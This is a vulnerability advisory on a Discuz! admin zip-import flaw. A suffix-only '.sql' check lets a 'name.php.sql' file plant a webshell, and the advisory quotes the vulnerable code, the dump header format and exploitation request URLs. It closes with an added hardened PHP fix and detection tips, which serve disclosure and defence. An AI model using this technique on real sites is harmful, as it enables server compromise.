Discuz! admin\database.inc.php get-webshell bug
author: ring04h
team: http://www.80vul.com
[This vulnerability was discovered and submitted by ring04h, thx]

Because action=importzip in Discuz!'s admin\database.inc.php extracts a zip archive and writes its entries to disk, a webshell can be obtained.

I. Analysis

In the file admin\database.inc.php the code reads:

.....
elseif($operation == 'importzip') {

    require_once DISCUZ_ROOT.'admin/zip.func.php';
    $unzip = new SimpleUnzip();
    $unzip->ReadFile($datafile_server);
    if($unzip->Count() == 0 || $unzip->GetError(0) != 0 || !preg_match("/\.sql$/i", $importfile = $unzip->GetName(0))) {
        cpmsg('database_import_file_illegal', '', 'error');
    }

    $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s*(\w+).*/s", "\\1", substr($unzip->GetData(0), 0, 256))));
    $confirm = !empty($confirm) ? 1 : 0;
    if(!$confirm && $identify[1] != $version) {
        cpmsg('database_import_confirm', 'admincp.php?action=database&operation=importzip&datafile_server=$datafile_server&importsubmit=yes&confirm=yes', 'form');
    }

    $sqlfilecount = 0;
    foreach($unzip->Entries as $entry) {
        if(preg_match("/\.sql$/i", $entry->Name)) {
            $fp = fopen('./forumdata/'.$backupdir.'/'.$entry->Name, 'w');
            fwrite($fp, $entry->Data);
            fclose($fp);
            $sqlfilecount++;
        }
    }
......

Note two points:

1. preg_match("/\.sql$/i", $importfile = $unzip->GetName(0))
   Only the ".sql" suffix is checked, so Apache's multiple-extension handling can be relied on with a file name such as 081127_k4pFUs3C-1.php.sql.

2. $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s*(\w+).*/s", "\\1", substr($unzip->GetData(0), 0, 256))));
   So the file format must be respected [you can make a backup first, then modify it and repackage it as a zip]:

# Identify: MTIyNzc1NzEyNSw2LjEuMCxkaXNjdXosbXVsdGl2b2wsMQ==
#
#
# Discuz! Multi-Volume Data Dump Vol.1
# Version: Discuz! 6.1.0
# Time: 2008-11-27 11:38
# Type: discuz
# Table Prefix: cdb_

II. Exploitation

Submit:

<6.0 : admincp.php?action=importzip&datafile_server=./[attachment path]/[attachment name].zip&importsubmit=yes
=6.1 : admincp.php?action=database&operation=importzip&datafile_server=./[attachment path]/[attachment name].zip&importsubmit=yes&frames=yes

III. Patch [fix]

missing
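The advisory gives no fix, so the following is an added illustration of how the importzip loop could be hardened; it is not Discuz!'s own patch and is not taken from the advisory. It assumes the same SimpleUnzip API ($unzip->Entries, $entry->Name, $entry->Data), the same $backupdir and cpmsg() as the quoted code; isSafeSqlEntryName() and validateZipEntries() are hypothetical helper names. The point it demonstrates is that every entry name, not only the first, is checked against a strict whitelist before any byte is written, which closes both the "name.php.sql" multiple-extension trick and path components in entry names:

```php
<?php
// Added example, not the project's own patch: hardened importzip write loop.

// Accept only a plain basename of the form "stem.sql" where the stem contains
// no dot. "081127_k4pFUs3C-1.php.sql" is rejected because its stem has a dot,
// so Apache's multiple-extension handling cannot map the file to PHP.
// \z (not $) is used so a trailing newline in the name cannot slip past.
function isSafeSqlEntryName($name)
{
    return basename($name) === $name
        && preg_match('/^[A-Za-z0-9_-]+\.sql\z/', $name) === 1;
}

// Validate the whole archive up front: one bad entry rejects the import,
// instead of silently skipping it as the original loop does.
function validateZipEntries(array $entries)
{
    if (count($entries) == 0) {
        return false;
    }
    foreach ($entries as $entry) {
        if (!isSafeSqlEntryName($entry->Name)) {
            return false;
        }
    }
    return true;
}

// Hardened replacement for the write loop inside the importzip branch.
// $unzip, $backupdir and cpmsg() are assumed to exist as in the quoted code.
if (!validateZipEntries($unzip->Entries)) {
    cpmsg('database_import_file_illegal', '', 'error');
}

$sqlfilecount = 0;
foreach ($unzip->Entries as $entry) {
    // basename() is redundant after validation but keeps the write path
    // obviously confined to the backup directory even if the check changes.
    $target = './forumdata/'.$backupdir.'/'.basename($entry->Name);
    $fp = fopen($target, 'w');
    fwrite($fp, $entry->Data);
    fclose($fp);
    $sqlfilecount++;
}
```

Even with the name check, the dump is still written under ./forumdata/, which is web-reachable; serving that directory with script execution disabled (or keeping backups outside the document root) is the second layer that makes a stray file harmless. For detection, a .sql import whose archive contains any entry with more than one dot in its name, or with a directory component, is worth alerting on in the admin action log.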